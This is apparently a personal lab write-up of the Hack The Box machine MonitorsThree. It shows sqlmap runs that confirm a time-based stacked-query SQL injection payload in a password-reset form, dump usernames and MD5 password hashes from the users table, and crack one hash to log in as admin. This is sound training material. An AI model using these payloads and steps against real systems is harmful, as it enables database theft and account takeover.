InfoSec LAB

MonitorsThree_SQLi

Created: 6 min read

SQLi

An injection point was initially identified manually while attempting to enumerate valid username via the error message.

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ sqlmap -r ./req.txt --random-agent --level=5 --risk=3                                                            
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 15:44:46 /2024-08-25/
 
[15:44:46] [INFO] parsing HTTP request from './req.txt'
[15:44:46] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
 
[15:44:48] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
 
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
 
[...REDACTED...]
 
sqlmap identified the following injection point(s) with a total of 3767 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=';SELECT SLEEP(5)#
---

Confirmed!

DBs

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ sqlmap -r ./req.txt --random-agent --level=5 --risk=3 --dbs  
 
[...REDACTED...]
 
available databases [2]:
[*] information_schema
[*] monitorsthree_db
 
[16:19:31] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/monitorsthree.htb'
 
[*] ending @ 16:19:31 /2024-08-25/

monitorsthree_db

monitorsthree_db.users

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ sqlmap -r ./req.txt --random-agent --level=5 --risk=3 -D monitorsthree_db -T users --dump --technique=BEUS --not-string='Unable to process request, try again!'        
 
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
 
 
[...REDACTED...]
 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=';SELECT SLEEP(5)#
---
[17:22:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:22:20] [INFO] fetching columns for table 'users' in database 'monitorsthree_db'
[17:22:20] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)         
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
[17:22:34] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[17:22:20] [INFO] retrieved: 9
[17:22:20] [INFO] retrieved: id
[17:22:20] [INFO] retrieved: username
[17:22:20] [INFO] retrieved: email
[17:22:31] [INFO] retrieved: password
[17:24:52] [INFO] retrieved: name
[17:25:49] [INFO] retrieved: position
[17:28:21] [INFO] retrieved: dob
[17:29:12] [INFO] retrieved: start_date
[17:32:03] [INFO] retrieved: salary

Only need username and password columns

monitorsthree_db.users.username

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ sqlmap -r ./req.txt --random-agent --level=5 --risk=3 -D monitorsthree_db -T users -C username --dump --technique=BEUS --not-string='Unable to process request, try again!'
 
[*] starting @ 17:33:54 /2024-08-25/
 
[17:33:54] [INFO] parsing HTTP request from './req.txt'
[17:33:54] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] 
 
[17:33:56] [INFO] resuming back-end DBMS 'mysql' 
[17:33:56] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] 
 
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=';SELECT SLEEP(5)#
---
[17:33:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:33:59] [INFO] fetching entries of column(s) 'username' for table 'users' in database 'monitorsthree_db'
[17:33:59] [INFO] fetching number of column(s) 'username' entries for table 'users' in database 'monitorsthree_db'
[17:33:59] [INFO] Retrieved: 4
[17:33:59] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)  
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
 
 
Database: monitorsthree_db
Table: users
[4 entries]
+-----------+
| username  |
+-----------+
| admin     |
| dthompson |
| janderson |
| mwatson   |
+-----------+
 
[*] ending @ 17:43:33 /2024-08-25/
  • admin
  • dthimpson
  • janderson
  • mwatson

monitorsthree_db.users.password

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ sqlmap -r ./req.txt --random-agent --level=5 --risk=3 -D monitorsthree_db -T users -C password --dump --technique=BEUS --not-string='Unable to process request, try again!'
 
[*] starting @ 17:46:14 /2024-08-25/
 
[17:46:14] [INFO] parsing HTTP request from './req.txt'
[17:46:14] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] 
 
[17:46:16] [INFO] resuming back-end DBMS 'mysql' 
[17:46:16] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] 
 
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=';SELECT SLEEP(5)#
---
[17:46:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:46:22] [INFO] fetching entries of column(s) 'password' for table 'users' in database 'monitorsthree_db'
[17:46:22] [INFO] fetching number of column(s) 'password' entries for table 'users' in database 'monitorsthree_db'
[17:46:22] [INFO] resumed: 4
[17:46:22] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)  
[17:46:24] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
 
 
[18:23:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
 
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: monitorsthree_db
Table: users
[4 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 1e68b6eb86b45f6d92f8f292428f77ac |
| 31a181c8372e3afc59dab863430610e8 |
| 633b683cc128fe244b00f176c8a950f5 |
| c585d01f2eb3e6e1073e92023088a3dd |
+----------------------------------+
 
[18:24:03] [INFO] table 'monitorsthree_db.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/monitorsthree.htb/dump/monitorsthree_db/users.csv'
[18:24:03] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/monitorsthree.htb'
 
[*] ending @ 18:24:03 /2024-08-25/
  • 1e68b6eb86b45f6d92f8f292428f77ac
  • 31a181c8372e3afc59dab863430610e8
  • 633b683cc128fe244b00f176c8a950f5
  • c585d01f2eb3e6e1073e92023088a3dd
Password Cracking

crackstation.net cracked one of the password hashes; greencacti2001

Validation

Logging in as the admin user to the login page at login.php

Interactive Graph View

Backlinks